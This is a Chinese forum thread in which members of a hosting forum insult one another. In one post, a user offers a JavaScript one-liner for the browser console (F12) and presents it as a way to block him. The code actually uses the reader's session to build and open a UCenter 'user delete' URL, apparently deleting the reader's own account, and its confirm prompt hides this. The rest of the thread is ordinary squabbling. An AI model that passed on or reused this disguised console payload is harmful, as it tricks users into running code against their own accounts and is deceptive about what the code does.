全球主机交流论坛

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
楼主: 购买推荐

@cpuer 刚放出来就签名骂人

继续吃瓜,我就想看看多少人骂你

在Loc这么多年, 人人喊打的,我也就见过你和PR

如果不敢对线,就拉黑我,别老天天带节奏

拉黑我的代码我给你准备好了:

浏览器F12直接执行,别恶心人了OK

1. location.href=((d=(await(await fetch("./home.php?mod=spacecp&ac=avatar&old=1",{credentials:'include'})).text()).match(/\/\/\S+\/images\/ca\S+&ag/g)[0].replace('images/camera.swf?','?m=user&a=delete&'))&&confirm('真的要拉黑@小学生?'))?d:'';
复制代码
唉,不对线真没意思
围观。。。真热闹啊
F22 发表于 2022-5-12 16:26
你是不是忘了自己也是刚放出来?

刚放出来就要咬人  
别老@管理,出来对线
不知道说了什么,就顶楼的帖子截图看不出骂人啊

但是要@小学生, 不是啥都不能说、也不是非逼着你感恩,只是注意一下场合嘛,loc属于私人地盘,家主说某些东西谢绝讨论那大家就别讨论嘛,就好像韦神来我家讲数学我完全有权利让他滚蛋啊
头盔男 发表于 2022-5-12 16:36
不知道说了什么,就顶楼的帖子截图看不出骂人啊

但是要@小学生, 不是啥都不能说、也不是非逼着你感恩,只 ...

大佬说得对,不让键证就不说,但是这是个双标狗,你可能没吃到这个瓜。给你补个链接:https://hostloc.com/thread-1016010-1-1.html

看完你大概就知道为什么大家都在骂它